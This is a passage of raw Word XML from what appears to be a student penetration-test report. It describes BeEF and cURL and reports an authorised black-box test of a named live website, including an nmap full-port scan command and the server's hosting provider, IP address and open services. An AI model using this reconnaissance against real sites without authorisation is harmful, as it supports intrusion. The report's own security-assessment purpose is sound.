        <w:t xml:space="preserve"> around the globe because of the large economic cost of £20,000 per annum per user.</w:t>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://metasploit.help.rapid7.com/docs/msf-overview","abstract":"metasploit","accessed":{"date-parts":[["2018","5","23"]]},"author":[{"dropping-particle":"","family":"Rapid7","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"metasploit.rapid7.com","id":"ITEM-1","issued":{"date-parts":[["2018"]]},"page":"1","title":"Metasploit Framework","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=f6f169ea-4181-39ce-ada7-4ada9ed36fb1"]},{"id":"ITEM-2","itemData":{"DOI":"10.1017/CBO9781107415324.004","ISBN":"9788578110796","ISSN":"19454589","PMID":"25246403","abstract":"In Penetration Testing, security researcher and trainer Georgia Weidman provides you with a survey of important skills that any aspiring pentester needs. This beginner-friendly book opens with some basics of programming and helps you navigate Kali Linux, an operating system that comes preloaded with useful computer security tools like Wireshark and Metasploit. You'll learn about gathering information on a target, social engineering, capturing network traffic, analyzing vulnerabilities, developing exploits, and more. Hands-on examples discuss even advanced topics like mobile device security and bypassing anti-virus software.","author":[{"dropping-particle":"","family":"Weidman","given":"Georgia","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"No Starch Press","id":"ITEM-2","issued":{"date-parts":[["2014"]]},"title":"Penetration Testing: A Hands-On Introduction to Hacking","type":"book"},"uris":["http://www.mendeley.com/documents/?uuid=b898e1ff-12b4-496f-9c55-14335b2e0b40"]}],"mendeley":{"formattedCitation":"[48], [59]","plainTextFormattedCitation":"[48], [59]","previouslyFormattedCitation":"[48], [59]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B64925" w:rsidRPr="00B64925">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[48], [59]</w:t>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA10C09" w14:textId="77777777" w:rsidR="00367CE3" w:rsidRPr="00367CE3" w:rsidRDefault="00367CE3" w:rsidP="00367CE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26770BBF" w14:textId="703D4122" w:rsidR="006063FC" w:rsidRDefault="00367CE3" w:rsidP="006063FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007A7AAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Browser Exploitation Framework (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7AAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7AAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>): -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00367CE3">
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:r w:rsidR="005D506B">
        <w:t xml:space="preserve">GUI </w:t>
      </w:r>
      <w:r w:rsidRPr="00367CE3">
        <w:t>specialised framework is utilised for website penetration testing</w:t>
      </w:r>
      <w:r w:rsidR="005D506B">
        <w:t xml:space="preserve"> and is considered to be the industry standard tool to utilise </w:t>
      </w:r>
      <w:r w:rsidR="00386DAC">
        <w:t>when</w:t>
      </w:r>
      <w:r w:rsidR="005D506B">
        <w:t xml:space="preserve"> exploiting</w:t>
      </w:r>
      <w:r w:rsidRPr="00367CE3">
        <w:t xml:space="preserve"> XSS and SQLi</w:t>
      </w:r>
      <w:r w:rsidR="005D506B">
        <w:t xml:space="preserve"> vulnerabilities within a website. It consists of many plugins and modules that can be utilsed to leverage against a target, by ‘hooking’ a target within a </w:t>
      </w:r>
      <w:r w:rsidR="00E1347F">
        <w:t xml:space="preserve">client </w:t>
      </w:r>
      <w:r w:rsidR="005D506B">
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="00E1347F">
        <w:t>site browser</w:t>
      </w:r>
      <w:r w:rsidR="005D506B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E1347F">
        <w:t>using a ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E1347F">
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E1347F">
        <w:t xml:space="preserve"> Hook’ </w:t>
      </w:r>
      <w:r w:rsidR="00386DAC">
        <w:t xml:space="preserve">that runs from a self-generated local webserver on the attacker machine to leverage exploits against a website target. Although it is most commonly utilised to exploit XSS and SQLi vulnerabilities as previously discussed, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00386DAC">
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00386DAC">
        <w:t xml:space="preserve"> also contains a multitude of website vulnerability exploits that can also be </w:t>
      </w:r>
      <w:r w:rsidR="006063FC">
        <w:t>utilsed to</w:t>
      </w:r>
      <w:r w:rsidR="00386DAC">
        <w:t xml:space="preserve"> leverage against a target.</w:t>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.","author":[{"dropping-particle":"","family":"Project","given":"Beef","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Beefproject.com","id":"ITEM-1","issued":{"date-parts":[["2012"]]},"title":"BeEF - The Browser Exploitation Framework Project","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=2d00b074-f718-4c0b-987a-aea3aa266188"]}],"mendeley":{"formattedCitation":"[107]","plainTextFormattedCitation":"[107]","previouslyFormattedCitation":"[107]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B64925" w:rsidRPr="00B64925">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[107]</w:t>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="400A711C" w14:textId="77777777" w:rsidR="006063FC" w:rsidRPr="006063FC" w:rsidRDefault="006063FC" w:rsidP="006063FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44E43F04" w14:textId="563FC078" w:rsidR="00CA26EA" w:rsidRDefault="00112D00" w:rsidP="00CA26EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006063FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client Uniform Resource Locator (CURL)</w:t>
      </w:r>
      <w:r w:rsidR="007A7AAF" w:rsidRPr="006063FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="006063FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>This</w:t>
      </w:r>
      <w:r w:rsidRPr="00112D00">
        <w:t xml:space="preserve"> is a very</w:t>
      </w:r>
      <w:r w:rsidR="006063FC">
        <w:t xml:space="preserve"> lightweight</w:t>
      </w:r>
      <w:r w:rsidRPr="00112D00">
        <w:t xml:space="preserve"> and historical Linux tool that is very </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">efficient and useful, that can be utilsed to </w:t>
      </w:r>
      <w:r w:rsidRPr="008327AA">
        <w:t xml:space="preserve">access hidden directories </w:t>
      </w:r>
      <w:r w:rsidR="008327AA" w:rsidRPr="008327AA">
        <w:t xml:space="preserve">or pages </w:t>
      </w:r>
      <w:r w:rsidRPr="008327AA">
        <w:t>within a website browser and download/steal source code</w:t>
      </w:r>
      <w:r w:rsidR="006063FC">
        <w:t>, documents etc</w:t>
      </w:r>
      <w:r w:rsidRPr="008327AA">
        <w:t xml:space="preserve"> and/or upload documents</w:t>
      </w:r>
      <w:r w:rsidR="008327AA" w:rsidRPr="008327AA">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008327AA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006063FC" w:rsidRPr="008327AA">
        <w:t>malware</w:t>
      </w:r>
      <w:r w:rsidRPr="008327AA">
        <w:t xml:space="preserve"> etc to </w:t>
      </w:r>
      <w:r w:rsidR="008327AA" w:rsidRPr="008327AA">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="008327AA">
        <w:t xml:space="preserve">websites that </w:t>
      </w:r>
      <w:r w:rsidR="006063FC">
        <w:t>has</w:t>
      </w:r>
      <w:r w:rsidRPr="008327AA">
        <w:t xml:space="preserve"> not secured</w:t>
      </w:r>
      <w:r w:rsidRPr="006063FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006063FC" w:rsidRPr="006063FC">
        <w:t>their webserver correctly allowing unauthorised access and  file transfer to certain webpages within a website.</w:t>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00874CC3">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1016/b978-193226667-2/50049-9","author":[{"dropping-particle":"","family":"Foster","given":"James C.","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Osipov","given":"Vitaly","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Bhalla","given":"Nish","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Heinen","given":"Niels","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Aitel","given":"Dave","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Buffer Overflow Attacks","id":"ITEM-1","issued":{"date-parts":[["2005"]]},"title":"cURL Buffer Overflow on Linux","type":"chapter"},"uris":["http://www.mendeley.com/documents/?uuid=81b7b46c-efda-4730-988a-21ff1669e352"]},{"id":"ITEM-2","itemData":{"URL":"https://www.hacking.reviews/2017/08/web-application-penetration-testing.html?m=1","accessed":{"date-parts":[["2020","5","11"]]},"author":[{"dropping-particle":"","family":"Hacking Security Researchers","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"hacking.reveiws","id":"ITEM-2","issued":{"date-parts":[["2020"]]},"page":"1-1","title":"Web Application Penetration Testing with curl - Hacking Reviews","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=8cf15770-212d-3d77-877d-cd27cf58a612"]}],"mendeley":{"formattedCitation":"[108], [109]","plainTextFormattedCitation":"[108], [109]","previouslyFormattedCitation":"[108], [109]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B64925" w:rsidRPr="00B64925">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[108], [109]</w:t>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C413B" w14:textId="75B46513" w:rsidR="00C5650F" w:rsidRPr="00CA26EA" w:rsidRDefault="00CA26EA" w:rsidP="00053D38">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA26EA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Post Exploitation Tools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">:- </w:t>
      </w:r>
      <w:r w:rsidR="00843831">
        <w:t xml:space="preserve">No post exploitation tools or </w:t>
      </w:r>
      <w:r w:rsidR="00FD1029">
        <w:t>techniques</w:t>
      </w:r>
      <w:r w:rsidR="00843831">
        <w:t xml:space="preserve"> will be utilsed within this test in accordance with the contingency policy previously set out by the CEO</w:t>
      </w:r>
      <w:r w:rsidR="00FD1029">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00843831">
        <w:t>CTO of the company that explicitly outlines that no persistent malware such as trojan horses or network pivoting is to be performed on the target website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C413C" w14:textId="2A08C183" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc40134044"/>
      <w:r>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidR="00F876CA">
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Live Penetration Test</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="756762D5" w14:textId="3768019D" w:rsidR="00EF6ABD" w:rsidRDefault="00910AA6" w:rsidP="001A5246">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Utilising the</w:t>
      </w:r>
      <w:r w:rsidR="00874CC3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">PTES </w:t>
      </w:r>
      <w:r w:rsidR="00EF6ABD">
        <w:t>framewor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">k a live penetration test was performed against the website target </w:t>
      </w:r>
      <w:r w:rsidRPr="001A5246">
        <w:t>www.tevelcyber.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> after written authorisation in </w:t>
      </w:r>
      <w:r w:rsidR="001A5246">
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> form of an E-Mail</w:t>
      </w:r>
      <w:r w:rsidR="001A5246">
        <w:t xml:space="preserve"> from the company domain, outlining the pre-evaluation discussions and parameters that were put in place along with the permission to form a ‘Black Box’ penetration test on the companies live website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60582BC3" w14:textId="14F9FAD8" w:rsidR="00E76966" w:rsidRDefault="0090297E" w:rsidP="00E76966">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc40134045"/>
      <w:r>
        <w:t>6.1 Information Gathering</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="358EC34B" w14:textId="7102CEDF" w:rsidR="00794AC9" w:rsidRDefault="001A5246" w:rsidP="00794AC9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The first tool that was utilsed within the information gathering stage was Nmap, to retrieve the IP address and Fully Qualified Domain Name (FQDN)</w:t>
      </w:r>
      <w:r w:rsidR="00874CC3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00874CC3">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00874CC3">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://docs.microsoft.com/en-us/windows/desktop/dns/naming-conventions#fully-qualified-domain-name","accessed":{"date-parts":[["2019","1","22"]]},"author":[{"dropping-particle":"","family":"Microsoft","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"microsoft.com","id":"ITEM-1","issued":{"date-parts":[["2018"]]},"page":"1","title":"FQDN - Naming Conventions - Windows applications | Microsoft Docs","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=79173f47-5fa1-3912-b0ce-6b1ec92725e2"]}],"mendeley":{"formattedCitation":"[110]","plainTextFormattedCitation":"[110]","previouslyFormattedCitation":"[110]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00874CC3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00874CC3" w:rsidRPr="00874CC3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[110]</w:t>
      </w:r>
      <w:r w:rsidR="00874CC3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of the hosting webserver</w:t>
      </w:r>
      <w:r w:rsidR="00794AC9">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> along with all of the open </w:t>
      </w:r>
      <w:r w:rsidR="00794AC9">
        <w:t xml:space="preserve">and filtered </w:t>
      </w:r>
      <w:r>
        <w:t>ports that</w:t>
      </w:r>
      <w:r w:rsidR="00794AC9">
        <w:t xml:space="preserve"> are being utilsed that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can be further investigated to identify if they are vulnerable. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5518DA34" w14:textId="6095F946" w:rsidR="001A5246" w:rsidRPr="001A5246" w:rsidRDefault="001A5246" w:rsidP="00794AC9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The results from the Nmap </w:t>
      </w:r>
      <w:r w:rsidR="00794AC9">
        <w:t xml:space="preserve">stealth </w:t>
      </w:r>
      <w:r w:rsidR="00794AC9" w:rsidRPr="00794AC9">
        <w:t>synchronization acknowledged</w:t>
      </w:r>
      <w:r w:rsidR="00794AC9">
        <w:t xml:space="preserve"> ‘SYN’ scan</w:t>
      </w:r>
      <w:r w:rsidR="00874CC3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00874CC3">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B7735E">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"Learn about using Nmap to scan for open ports, IP ranges, updated servers and more. Also, see how an IPID Idle scan (option -sI) and TCP SYN stealth scan can verify MySQL database versions.","author":[{"dropping-particle":"","family":"Cobb","given":"Michael","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"ComputerWeekly.com","id":"ITEM-1","issued":{"date-parts":[["2009"]]},"title":"Using Nmap to scan for open ports, updated servers and more","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=147624b2-2952-416d-8523-0060e5033bf5"]}],"mendeley":{"formattedCitation":"[111]","plainTextFormattedCitation":"[111]","previouslyFormattedCitation":"[111]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00874CC3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00874CC3" w:rsidRPr="00874CC3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[111]</w:t>
      </w:r>
      <w:r w:rsidR="00874CC3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00794AC9">
        <w:t xml:space="preserve">[Syntax: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00794AC9">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00794AC9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00794AC9">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00794AC9">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00794AC9">
        <w:t>sN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00794AC9">
        <w:t xml:space="preserve"> -p 1-65535 </w:t>
      </w:r>
      <w:r w:rsidR="00794AC9" w:rsidRPr="00794AC9">
        <w:t>www.tevelcyber.com</w:t>
      </w:r>
      <w:r w:rsidR="00794AC9">
        <w:t xml:space="preserve">], </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that scanned all 65,535 (2^16) ports can be found in </w:t>
      </w:r>
      <w:r w:rsidRPr="00874CC3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="00874CC3" w:rsidRPr="00874CC3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A84F6E7" w14:textId="77777777" w:rsidR="00874CC3" w:rsidRDefault="00A136C2" w:rsidP="00874CC3">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AD08D27" wp14:editId="02076DD4">
            <wp:extent cx="5730240" cy="3642360"/>
            <wp:effectExtent l="19050" t="19050" r="22860" b="152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w="6350">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DDA58B" w14:textId="35BB7F9F" w:rsidR="00E76966" w:rsidRPr="00874CC3" w:rsidRDefault="00874CC3" w:rsidP="00874CC3">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc40134068"/>
      <w:r w:rsidRPr="00874CC3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00874CC3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00874CC3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00874CC3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E77759">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00874CC3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00874CC3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Nmap Scan of Target Website </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00874CC3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Tevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00874CC3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cyber</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="0443AD42" w14:textId="116B2D88" w:rsidR="00636308" w:rsidRDefault="00275F6C" w:rsidP="00BB20F4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As </w:t>
      </w:r>
      <w:r w:rsidRPr="00874CC3">
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="00874CC3">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> illustrates that there are currently 27 ports open on the </w:t>
      </w:r>
      <w:r w:rsidR="00E83897" w:rsidRPr="00E83897">
        <w:t>www.tevelcyber.com</w:t>
      </w:r>
      <w:r w:rsidR="00E83897">
        <w:t xml:space="preserve"> and that the FQDN of the server</w:t>
      </w:r>
      <w:r w:rsidR="0064623C">
        <w:t xml:space="preserve"> that includes the CSP in</w:t>
      </w:r>
      <w:r w:rsidR="00E83897">
        <w:t xml:space="preserve"> which it </w:t>
      </w:r>
      <w:r w:rsidR="0064623C">
        <w:t>the website is being</w:t>
      </w:r>
      <w:r w:rsidR="00E83897">
        <w:t xml:space="preserve"> hosted </w:t>
      </w:r>
      <w:r w:rsidR="0064623C">
        <w:t>up</w:t>
      </w:r>
      <w:r w:rsidR="00E83897">
        <w:t>on is;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB20F4">
        <w:t xml:space="preserve">Ns8202.hostgator.com </w:t>
      </w:r>
      <w:r w:rsidR="00E83897">
        <w:t xml:space="preserve">with a public IP address of </w:t>
      </w:r>
      <w:r w:rsidR="00BB20F4">
        <w:t>192.185.39.52</w:t>
      </w:r>
      <w:r w:rsidR="00E83897">
        <w:t>/32</w:t>
      </w:r>
      <w:r w:rsidR="00EC4B98">
        <w:t>, the webserver is utilising port 443 SSL/TLS for HTTPS encryption and port 80 for HTTP website browser communication</w:t>
      </w:r>
      <w:r w:rsidR="0064623C">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00EC4B98">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAE29BD" w14:textId="40A5788A" w:rsidR="00586631" w:rsidRDefault="00636308" w:rsidP="00BB20F4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The results show that the server is also hosting a mail server with the services; Simple Message Transport Protocol</w:t>
      </w:r>
      <w:r w:rsidR="002521AB">
        <w:t xml:space="preserve"> Secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (SMTP</w:t>
      </w:r>
      <w:r w:rsidR="002521AB">
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00B7735E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, Post Office Protocol 3 </w:t>
      </w:r>
      <w:r w:rsidR="002521AB">
        <w:t xml:space="preserve">Secure </w:t>
      </w:r>
      <w:r>
        <w:t>(POP3</w:t>
      </w:r>
      <w:r w:rsidR="002521AB">
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00636308">
        <w:t>Internet Message Access Protocol</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Secure (IMAPS)</w:t>
      </w:r>
      <w:r w:rsidR="00EC4B98">
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
